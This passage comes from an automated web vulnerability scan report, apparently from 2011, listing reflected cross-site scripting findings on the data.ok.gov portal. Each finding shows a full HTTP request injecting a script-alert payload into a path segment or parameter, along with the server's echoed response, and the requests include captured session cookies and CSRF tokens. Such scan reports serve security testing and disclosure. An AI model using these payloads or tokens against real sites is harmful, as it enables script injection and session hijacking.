Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:40 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views86e9c<script>alert(1)</script>bfeb2fe5933/xxvf-kunf/snapshots/page\""
}

3.18. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7d0d3<script>alert(1)</script>29504336c09 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:41 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/xxvf-kunf7d0d3<script>alert(1)</script>29504336c09/snapshots/page\""
}

3.19. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae8bc<script>alert(1)</script>2a2deed4792 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page?size=thumb HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:42 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 154

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/xxvf-kunf/snapshotsae8bc<script>alert(1)</script>2a2deed4792/page\""
}

3.20. http://data.ok.gov/api/views/xxvf-kunf/snapshots/page [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /api/views/xxvf-kunf/snapshots/page

Issue detail

The value of the size request parameter is copied into the HTML document as plain text between tags. The payload a2723<script>alert(1)</script>42d84a967a3 was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/views/xxvf-kunf/snapshots/page?size=thumba2723<script>alert(1)</script>42d84a967a3 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:21:38 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No snapshot at size thumba2723<script>alert(1)</script>42d84a967a3
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 129

{
"code" : "not_found",
"error" : true,
"message" : "No snapshot at size thumba2723<script>alert(1)</script>42d84a967a3"
}

3.21. http://data.ok.gov/views.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2d195<script>alert(1)</script>d4691d85556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views.json2d195<script>alert(1)</script>d4691d85556?accessType=WEBSITE&_=1304162592421&method=getCountForTableId&tableId=220869 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:01 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views.json2d195<script>alert(1)</script>d4691d85556"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views.json2d195<script>alert(1)</script>d4691d85556\""
}

3.22. http://data.ok.gov/views.json [tableId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views.json

Issue detail

The value of the tableId request parameter is copied into the HTML document as plain text between tags. The payload e68f4<script>alert(1)</script>72f6a33362c was submitted in the tableId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views.json?accessType=WEBSITE&_=1304162592421&method=getCountForTableId&tableId=220869e68f4<script>alert(1)</script>72f6a33362c HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '220869e68f4<script>alert(1)</script>72f6a33362c'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 133

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '220869e68f4<script>alert(1)</script>72f6a33362c'"
}

3.23. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload adb9b<script>alert(1)</script>396285aefbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:21 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/viewsadb9b<script>alert(1)</script>396285aefbf/INLINE/rows.json\""
}

3.24. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd835<script>alert(1)</script>6cc009600c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:23 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/INLINEbd835<script>alert(1)</script>6cc009600c2/rows.json\""
}

3.25. http://data.ok.gov/views/INLINE/rows.json [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59df6<script>alert(1)</script>13a82cfdea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4?accessType=WEBSITE&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:25 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/INLINE/rows.json59df6<script>alert(1)</script>13a82cfdea4\""
}

3.26. http://data.ok.gov/views/INLINE/rows.json [accessType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the accessType request parameter is copied into the HTML document as plain text between tags. The payload 569be<script>alert(1)</script>05d4894cf0c was submitted in the accessType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE569be<script>alert(1)</script>05d4894cf0c&method=getByIds&start=0&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:16 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: 'WEBSITE569be<script>alert(1)</script>05d4894cf0c'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: 'WEBSITE569be<script>alert(1)</script>05d4894cf0c'"
}

3.27. http://data.ok.gov/views/INLINE/rows.json [length parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the length request parameter is copied into the HTML document as plain text between tags. The payload 2dc0c<script>alert(1)</script>06e805adce1 was submitted in the length parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0&length=1002dc0c<script>alert(1)</script>06e805adce1&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:20 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '1002dc0c<script>alert(1)</script>06e805adce1'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 130

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '1002dc0c<script>alert(1)</script>06e805adce1'"
}

3.28. http://data.ok.gov/views/INLINE/rows.json [start parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/INLINE/rows.json

Issue detail

The value of the start request parameter is copied into the HTML document as plain text between tags. The payload c08d2<script>alert(1)</script>ce23890d211 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/INLINE/rows.json?accessType=WEBSITE&method=getByIds&start=0c08d2<script>alert(1)</script>ce23890d211&length=100&meta=true HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440
Content-Length: 3125

{"id":"dz4w-xbzm","name":"Oklahoma Ignition Interlock Service Centers Map","attribution":"Oklahoma Board of Tests for Alcohol and Drug Influence","attributionLink":"http://www.ok.gov/bot","category":"
...[SNIP]...

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:23:18 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: '0c08d2<script>alert(1)</script>ce23890d211'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 128

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: '0c08d2<script>alert(1)</script>ce23890d211'"
}

3.29. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47fae<script>alert(1)</script>4549fe22511 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json?accessType=WEBSITE&method=getDefaultView&_=1304162592421 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
